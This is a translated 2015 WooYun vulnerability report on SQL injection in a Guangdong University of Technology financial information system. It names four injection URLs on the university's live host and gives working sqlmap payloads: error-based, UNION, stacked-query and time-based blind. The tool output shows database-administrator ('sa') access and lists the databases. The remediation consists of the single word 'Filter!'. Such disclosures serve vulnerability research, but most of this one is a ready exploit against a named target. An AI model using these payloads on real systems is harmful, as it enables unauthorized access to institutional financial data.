
Vulnerability Summary

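Bug ID: wooyun-2015-091360

Title: SQL injection in the Guangdong University of Technology financial information query system (four injection points)

Vendor: Guangdong University of Technology

Author: YuShen

Submitted: 2015-01-14 12:50

Fixed: 2015-01-19 12:52

Disclosed: 2015-01-19 12:52

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 15

Status: Handed over to a third-party partner organization (CCERT, the education network emergency response team) for handling

Source: http://www.wooyun.org; for questions or help, contact [email protected]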


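Vulnerability Details

Disclosure status:

2015-01-14: Details reported to the vendor; awaiting vendor handling
2015-01-19: The vendor actively ignored the vulnerability; details disclosed to the public

Brief description:

SQL injection

Detailed description:

SQL injection!

Proof of vulnerability:

Injection points: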
http://cwc.gdut.edu.cn/cwwj/cwwj.asp?lx=%C4%BC
http://cwc.gdut.edu.cn/fwzn/fwzn.asp?lx=%D6%B0
http://cwc.gdut.edu.cn/gzzd/showinfo.asp?ID=41
http://cwc.gdut.edu.cn/gg/showinfo.asp?id=605
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: lx
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: lx=%C4%BC' AND 2584=CONVERT(INT,(SELECT CHAR(113)+CHAR(112)+CHAR(121)+CHAR(98)+CHAR(113)+(SELECT (CASE WHEN (2584=2584) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(118)+CHAR(119)+CHAR(114)+CHAR(113))) AND 'iBct'='iBct
Type: UNION query
Title: Generic UNION query (NULL) - 7 columns
Payload: lx=%C4%BC' UNION ALL SELECT NULL,NULL,CHAR(113)+CHAR(112)+CHAR(121)+CHAR(98)+CHAR(113)+CHAR(120)+CHAR(84)+CHAR(89)+CHAR(71)+CHAR(74)+CHAR(103)+CHAR(88)+CHAR(88)+CHAR(71)+CHAR(103)+CHAR(113)+CHAR(118)+CHAR(119)+CHAR(114)+CHAR(113),NULL,NULL,NULL,NULL--
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: lx=%C4%BC'; WAITFOR DELAY '0:0:5'--
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase AND time-based blind (heavy query)
Payload: lx=%C4%BC' AND 3203=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) AND 'Orwo'='Orwo
---
[13:54:19] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows
web application technology: ASP.NET, ASP
back-end DBMS: Microsoft SQL Server 2005
[13:54:19] [INFO] fetched data logged to text files under 'C:\Documents and Settings\Administrator\.sqlmap\output\cwc.gdut.edu.cn'
[*] shutting down at 13:54:19
current user: 'sa'
current database: 'oa88'
available databases [6]:
[*] master
[*] model
[*] msdb
[*] oa88
[*] tempdb
[*] ykt
Database: oa88
[92 tables]

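Remediation:

Filter!

Copyright notice: When reprinting, please credit the source YuShen@乌云


Vulnerability Response

Vendor response:

Severity: No impact; ignored by vendor

Ignored at: 2015-01-19 12:52

Vendor reply:

Latest status:

None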